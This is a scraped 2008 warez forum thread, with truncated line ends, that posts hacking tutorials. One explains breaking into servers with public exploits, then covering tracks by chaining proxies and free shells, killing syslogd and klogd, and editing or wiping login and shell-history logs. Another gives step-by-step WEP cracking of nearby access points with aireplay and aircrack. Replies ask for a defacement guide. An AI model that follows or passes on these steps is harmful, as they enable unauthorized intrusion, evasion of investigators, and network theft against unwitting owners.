doing a port scan. Find out the specifics on the services by telnetting to them. Find any cgi script, or other files which could allow access to the
exploited by checking /cgi /cgi-bin and browsing around the site (remember to index browse)
Wasn't so hard to get the info was it? It may take awhile, but go through the site slowly and get all the information you can.
2. Getting In
Now that we got the info on the site we can find the exploit(s) we can use to get access. If you were a scanning script kiddie you would know th
ahead of time. A couple of great places to look for exploits are Security Focus and packetstorm. Once you get the exploit check and make sure t
exploit is for the same version as the service, OS, script, etc.. Exploits mainly come in two languages, the most used are C and perl. Perl scripts
in .pl or .cgi, while C will end in .c To compile a C file (on *nix systems) do gcc -o exploit12 file.c then: ./exploit12 For perl just do: chmod 700
(not really needed) then: perl file.pl. If it is not a script it might be a very simple exploit, or just a theory of a possible exploit. Just do alittle rese
how to use it. Another thing you need to check is weither the exploit is remote or local. If it is local you must have an account or physical acces
computer. If it is remote you can do it over a network (internet).
Don't go compiling exploits just yet, there is one more important thing you need to know
Covering Your Tracks
So by now you have gotten the info on the host inorder to find an exploit that will allow you to get access. So why not do it? The problem with
your tracks isn't that it is hard, rather that it is unpredictable. just because you killed the sys logging doesn't mean that they don't have another lo
IDS running somewhere else. (even on another box). Since most script kiddies don't know the skill of the admin they are targetting they have no
knowing if they have additional loggers or what. Instead the script kiddie makes it very hard (next to impossible) for the admin to track them do
Many use a stolden or second isp account to begin with, so even if they get tracked they won't get caught. If you don't have the luxery of this the
MUST use multiple wingates, shell accounts, or trojans to bounce off of. Linking them together will make it very hard for someone to track you
Logs on the wingates and shells will most likely be erased after like 2-7 days. That is if logs are kept at all. It is hard enough to even get ahold o
admin in a week, let alone further tracking the script kiddie down to the next wingate or shell and then getting ahold of that admin all before the
any are erased. And it is rare for an admin to even notice an attack, even a smaller percent will actively pursue the attacker at all and will just se
their box and forget it ever happend. For the sake of arugment lets just say if you use wingates and shells, don't do anything to piss the admin of
much (which will get them to call authoritizes or try to track you down) and you deleting logs you will be safe. So how do you do it?
We will keep this very short and too the point, so we'll need to get a few wingates. Wingates by nature tend to change IPs or shutdown all the tim
you need an updated list or program to scan the net for them. You can get a list of wingates that is well updated at
http://www.cyberarmy.com/lists/wingate/ and you can also get a program called winscan there. Now lets say we have 3 wingates:
212.96.195.33 port 23
202.134.244.215 port 1080
203.87.131.9 port 23
to use them we go to telnet and connect to them on port 23. we should get a responce like this:
CSM Proxy Server >
to connect to the next wingate we just type in it's ip:port
CSM Proxy Server >202.134.244.215:1080
If you get an error it is most likely to be that the proxy you are trying to connect to isn't up, or that you need to login to the proxy. If all goes we
will get the 3 chained together and have a shell account you are able to connect to. Once you are in your shell account you can link shells togeth
E-mail j00]$ ssh 212.23.53.74
You can get free shells to work with until you get some hacked shells, here is a list of free shell accounts. And please remember to sign up with
information and from a wingate if possible.
SDF (freeshell.org) - http://sdf.lonestar.org
GREX (cyberspace.org) - http://www.grex.org
NYX - http://www.nxy.net
ShellYeah - http://www.shellyeah.org
HOBBITON.org - http://www.hobbiton.org
FreeShells - http://www.freeshells.net
DucTape - http://www.ductape.net
Free.Net.Pl (Polish server) - http://www.free.net.pl
XOX.pl (Polish server) - http://www.xox.pl
IProtection - http://www.iprotection.com
CORONUS - http://www.coronus.com
ODD.org - http://www.odd.org
MARMOSET - http://www.marmoset.net
flame.org - http://www.flame.org
freeshells - http://freeshells.net.pk
LinuxShell - http://www.linuxshell.org
takiweb - http://www.takiweb.com
FreePort - http://freeport.xenos.net
BSDSHELL - http://free.bsdshell.net
ROOTshell.be - http://www.rootshell.be
shellasylum.com - http://www.shellasylum.com
Daforest - http://www.daforest.org
FreedomShell.com - http://www.freedomshell.com
LuxAdmin - http://www.luxadmin.org
shellweb - http://shellweb.net
blekko - http://blekko.net
once you get on your last shell you can compile the exploit, and you should be safe from being tracked. But lets be even more sure and delete th
evidence that we were there.
Alright, there are a few things on the server side that all script kiddies need to be aware of. Mostly these are logs that you must delete or edit. Th
script kiddies might even use a rootkit to automaticly delete the logs. Although lets assume you aren't that lame. There are two main logging dae
which I will cover, klogd which is the kernel logs, and syslogd which is the system logs. First step is to kill the daemons so they don't log anym
your actions.
E-mail root]# ps -def | grep syslogd
E-mail root]# kill -9 pid_of_syslogd
in the first line we are finding the pid of the syslogd, in the second we are killing the daemon. You can also use /etc/syslog.pid to find the pid of
E-mail root]# ps -def | grep klogd
E-mail root]# kill -9 pid_of_klogd
Same thing happening here with klogd as we did with syslogd.
now that killed the default loggers the script kiddie needs to delete themself from the logs. To find where syslogd puts it's logs check the /etc/sy
file. Of course if you don't care if the admin knows you were there you can delete the logs completely. Lets say you are the lamest of the script
defacer, the admin would know that the box has been comprimised since the website was defaced. So there is no point in appending the logs, th
just delete them. The reason we are appending them is so that the admin will not even know a break in has accurd. I'll go over the main reasons
break into a box:
To deface the website. - this is really lame, since it has no point and just damages the system.
To sniff for other network passwords. - there are programs which allow you to sniff other passwords sent from and to the box. If this box is on a
ethernet network then you can even sniff packets (which contain passwords) that are destine to any box in that segment.
To mount a DDoS attack. - another lame reason, the admin has a high chance of noticing that you comprimised him once you start sending hund
MBs through his connection.
To mount another attack on a box. - this and sniffing is the most commonly used, not lame, reason for exploiting something. Since you now how
rootshell you can mount your attack from this box instead of those crappy freeshells. And you now have control over the logging of the shell.
To get sensitive info. - some corperate boxes have alot of valueable info on them. Credit card databases, source code for software, user/passwor
and other top secret info that a hacker may want to have.
To learn and have fun. - many people do it for the thrill of hacking, and the knowledge you gain. I don't see this as horrible a crime as defacing.
as you don't destroy anything I don't think this is very bad. Infact some people will even help the admin patch the hole. Still illegal though, and
to break into anyone's box.
I'll go over the basic log files: utmp, wtmp, lastlog, and .bash_history
These files are usually in /var/log/ but I have heard of them being in /etc/ /usr/bin/ and other places. Since it is different on alot of boxes it is bes
do a find / -iname 'utmp'|find / -iname 'wtmp'|find / -iname 'lastlog'. and also search threw the /usr/ /var/ and /etc/ directories for other logs. Now
explanation of these 3.
utmp is the log file for who is on the system, I think you can see why this log should be appended. Because you do not want to let anyone know
in the system. wtmp logs the logins and logouts as well as other info you want to keep away from the admin. Should be appended to show that y
logged in or out. and lastlog is a file which keeps records of all logins. Your shell's history is another file that keeps a log of all the commands y
issued, you should look for it in your $ HOME directory and edit it, .sh_history, .history, and .bash_history are the common names. you should
append these log files, not delete them. if you delete them it will be like holding a big sign infront of the admin saying "You've been hacked". N
script kiddies often deface and then rm -rf / to be safe. I would avoid this unless you are really freaking out. In this case I would suggest that you
try to exploit a box again. Another way to find log files is to run a script to check for open files (and then manually look at them to determine if
logs) or do a find for files which have been editted, this command would be: find / -ctime 0 -print
A few popular scripts which can hide your presence from logs include: zap, clear and cloak. Zap will replace your presence in the logs with 0's,
will clear the logs of your presence, and cloak will replace your presence with different information. acct-cleaner is the only heavily used script
deleting account logging from my experience. Most rootkits have a log cleaning script, and once you installed it logs are not kept of you anywa
are on NT the logs are at C:winNTsystem32LogFiles, just delete them, nt admins most likely don't check them or don't know what it means if th
deleted.
One final thing about covering your tracks, I won't go to into detail about this because it would require a tutorial all to itself. I am talking about
What are rootkits? They are a very widely used tool used to cover your tracks once you get into a box. They will make staying hidden painfree a
easy. What they do is replace the binaries like login, ps, and who to not show your presence, ever. They will allow you to login without a passw
without being logged by wtmp or lastlog and without even being in the /etc/passwd file. They also make commands like ps not show your proce
no one knows what programs you are running. They send out fake reports on netstat, ls, and w so that everything looks the way it normally wou
except anything you do is missing. But there are some flaws in rootkits, for one some commands produce strange effects because the binary was
made correctly. They also leave cenzurat (ways to tell that the file is from a rootkit). Only smart/good admins check for rootkits, so this isn't the
threat, but it should be concidered. Rootkits that come with a LKM (loadable kernel module) are usually the best as they can pretty much make
totally invisible to all others and most admins wouldn't be able to tell they were comprimised.
In writting this tutorial I have mixed feelings. I do not want more script kiddies out their scanning hundreds of sites for the next exploit. And I d
my name on any shouts. I rather would like to have people say "mmm, that defacing crap is pretty lame" especially when people with no lives s
exploits everyday just to get their name on a site for a few minutes. I feel alot of people are learning everything but what they need to know inor
break into boxes. Maybe this tutorial cut to the chase alittle and helps people with some knowledge see how simple it is and hopefully make the
that getting into a system is not all it's hyped up to be. It is not by any means a full guide, I did not cover alot of things. I hope admins found this
helpful aswell, learning that no matter what site you run you should always keep on top of the latest exploits and patch them. Protect yourself w
and try finding holes on your own system (both with vuln scanners and by hand). Also setting up an external box to log is not a bad idea. Admin
have also seen alittle bit into the mind of a script kiddie and learned a few things he does.. this should help you catch one if they break into your
On one final note, defacing is lame. I know many people who have defaced in the past and regret it now. You will be labeled a script kiddie and
for a long, long time.
Wep Cracking ( not for novices )
Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:
Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1
(^ download this from google)
As for wireless cards, you can use any but you have to have the drivers installed
Getting Started:
Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are
want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. M
you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text e
used pico);
Code: (Select all)
CODE
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=orinoco,eth1,kismet
#source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone
^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (
wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).
Note: To find your cards chipset have a good google on the model number of your card or try checking here http://www.linuxwlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets can
be found on the Kismet website under Documentation.
Changed kismet.conf:
CODE
Code: (Select all)
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
#source=orinoco,eth1,kismet
source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone
Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Once you have got kismet go
have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it ha
enabled it will have a Y, if not it will be a N.
Going in for the kill:
So now you got a target you are going to make sure you dont look suspicious and you got at least 15mins worth of battery life left Razz. Making
you know the channel the Access Point is on (under the CH cloumn in kismet) and also the mac address of the Access Point by hiting 's' (to sort
scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected.
First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got
CODE
Code: (Select all)
If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2
If you use wlan-ng, run
./wlanng.sh start wlan0 <channel> [comes with
AirePlay2.2]
Otherwise run:
iwconfig ath0 mode Monitor channel <channel>
ifconfig ath0 up
Read the AirePlay2.2 readme for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
Code:
Code: (Select all)
#./airodump
[version crap]
usage: ./airodump <wifi interface> <output filename> [mac filter]
e.g
./airodump wlan0 linksys
The mac filter is used when you have more than one Access point on the same channel at once, so say you have 'jim_home' and 'linksys' both es
access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hiting 's' (to sort) then scrolling to the des
Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from y
target, you see the IV column, those are whats known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number R
Now we are going to capture a 'weak key' packet from on the network we are targeting and going to flood the Access Point with it in hope that w
lots of 'weak key' replies sent out so we can eventually crack the password. So now in your other terminal window 'cd' into your aireplay directo
execute aireplay ('./aireplay'[return]):
CODE
Code: (Select all)
capture packets unless interface #1 is specified.
source options:
-i
: capture packet on-the-fly (default)
-r file
: extract packet from this pcap file
filter options:
-b bssid : MAC address, Access Point
-d dmac
: MAC address, Destination
-s smac
: MAC address, Source
-m len
: minimum packet length, default: 40
-n len
: maximum packet length, default: 512
-u type
: fc, type
- default: 2 = data
-v subt
: fc, subtype - default: 0 = normal
-t tods
: fc, To
DS bit - default: any
-f fromds : fc, From DS bit - default: any
-w iswep : fc, WEP
bit - default: 1
-y
: don't ask questions, assume yes
replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac
: set Destination MAC address
-h smac
: set Source
MAC address
-o fc0
: set frame control[0] (hex)
-p fc1
: set frame control[1] (hex)
-k
: turn chopchop attack on
e.g
./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0
Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet wh
aireplay will ask you if you want to use to then flood the Access Point with that packet. when it asks you if it can use one of the packets hit 'y' th
return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and
the IV packets should also be increasing pretty damn fast aswell, if all went well in about 10mins you should have enough packets to then dump
aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows
terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):
CODE
Code: (Select all)
aircrack 2.1 - (C) 2004 Christophe Devine
usage: ./aircrack [options] <pcap file> <pcap file> ...
-d <start> : debug - specify beginning of the key
-f <fudge> : bruteforce fudge factor (default: 2)
-m <maddr> : MAC address to filter usable packets
-n <nbits> : WEP key length: 64 / 128 / 256 / 512
-p <nfork> : SMP support: # of processes to start
-q <quiet> : Quiet mode (less print more speed)
e.g
./aircrack -n 128 linksys.cap
what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryptio
goes well you will get the key in nice red text.
KEY FOUND: [ Pwn3d ]
^ Nice ^
Happy Happy cracking, Majestic
(Please reply with any errors in my tutorial)
( NOT FOR NOOBS, I REPEAT, NOT FOR NOOBS
)
I will be completing all requests, reason why i cant post more on this post is because it is getting
extremely
Laggy lol
WHO ADDED
PROPZ?
.Ray
SiZ03
Ƨ0NIKKâ„¢
mcmb03
___________
Mr. Jackal
Anubis
kincalgary
dinger5
xeztrixx
Roger
Raccool
irdi1122
.Majestic
LaLow
Jumatuse
Depredate
Hc.Easy
Bram0s
jjjjjjjj55
finnigan
Drakuwa
Rashad
nukleus
StONE_ROdGEr
Pharoh
silent_seeker
Last edited by Majestic; 10-19-2008 at 06:17 AM.
Hacking- Request any tut Full Download
Download Hacking- Request any tut Full for FREE, It is available on fast direct download service
Download anything with more then 1000+ Kb/s downloading speed.
Pharoh
Rising Star
Joined: Aug 2008
Posts: 207
Shared Files: 24
Warnings: 0/0 (0)
Propz: 424
Activity: 0%
#2 (permalink)
Posted 10-18-2008, 08:37 AM
Yep nice guide,
No need fo kickoffs
i got my homies cover me with
WHO ADDED
PROPZ?
Profit
Majestic
Superstar
Joined: Jun 2008
Posts: 2,989
Shared Files: 1931
Warnings: 0/0 (0)
Propz: 6264
Activity: 3%
#3 (permalink)
Posted 10-18-2008, 08:39 AM
Originally Posted by Pharoh
Yep nice guide,
No need fo kickoffs
i got my homies cover me with
lol, so u wanna request any tut, am bored
Pharoh
Rising Star
Joined: Aug 2008
Posts: 207
Shared Files: 24
Warnings: 0/0 (0)
Propz: 424
Activity: 0%
#4 (permalink)
Posted 10-18-2008, 08:44 AM
No Thanks,Was going to request to deface a website only
a tut for that would be cool
Majestic
Superstar
Joined: Jun 2008
Posts: 2,989
Shared Files: 1931
Warnings: 0/0 (0)
Propz: 6264
Activity: 3%
#5 (permalink)
Posted 10-18-2008, 08:49 AM
Originally Posted by Pharoh
No Thanks,Was going to request to deface a website only
a tut for that would be cool
tut added
WHO ADDED
PROPZ?
Pharoh
Jazzy.Stahh
Hall of Famer
Joined: Jun 2008
Posts: 11,401
Shared Files: 10289
Warnings: 0/0 (0)
Propz: 4930
Activity: 61%
#6 (permalink)
Posted 10-18-2008, 08:50 AM
nice and uhhmmm
a working rs cracker tut
with software lool
SIGNATURE
Need Lockerz.com invites? Just visit http://inwarez.org/free-premium-acco...-points-2.html
Joined: Jun 2008
Posts: 1,410
White Supremacist Shared Files: 305
Warnings: 1/0 (0)
Propz: 9044
Activity: 42%
.Ray
#7 (permalink)
Posted 10-18-2008, 08:52 AM
i am going to sticky this, i read through the thread and i like it, if you can keep this up, helping people posting tutorials. it stays stuck. once it di
get unstickied.
good post majestic, you will receive propz
SIGNATURE
Majestic
Superstar
Joined: Jun 2008
Posts: 2,989
Shared Files: 1931
Warnings: 0/0 (0)
Propz: 6264
Activity: 3%
#8 (permalink)
Posted 10-18-2008, 08:53 AM
Originally Posted by Uproar
i am going to sticky this, i read through the thread and i like it, if you can keep this up, helping
people posting tutorials. it stays stuck. once it dies it will get unstickied.
good post majestic, you will receive propz
Thanks
Joined: Jun 2008
Posts: 1,410
White Supremacist Shared Files: 305
Warnings: 1/0 (0)
Propz: 9044
Activity: 42%
.Ray
#9 (permalink)
Posted 10-18-2008, 08:55 AM
just an idea, but color code each section of your tutorial. because reading through it. it is just ALL black =/ coloring it to see separations betwee
sections would help
SIGNATURE
Majestic
Superstar
Joined: Jun 2008
Posts: 2,989
Shared Files: 1931
Warnings: 0/0 (0)
Propz: 6264
Activity: 3%
#10 (permalink)
Posted 10-18-2008, 08:57 AM
Originally Posted by Lethal
nice and uhhmmm
a working rs cracker tut
with software lool
ill try to find one, i dont think thier will be one but i will try
123>>
Bookmarks








TAGS
hacking , request , tut
« Previous Thread | Next Thread »
Thread Tools
Show Printable Version
Email this Page
Display Modes
Linear Mode
Switch to Hybrid Mode
Switch to Threaded Mode
Search this Thread
Go
Advanced Search
-->
FRIENDLY SITES
Free Rapidshare
Warez-Centre
Code-Projects
WarezTopList
PlatinumW
OTHER AFFILIATES
Phoenix Forums
Nitroshare
WarezWitch
DreamDDL
All times are GMT -4. The time now is 10:42 AM.
1.14175 sec
-- InWarez v2.5
32 queries
GZIP E
Mark Forums Read - DMCA Policy - Contact Us - InWarez - Archiv
LinkBack
LinkBack URL
About LinkBacks
Download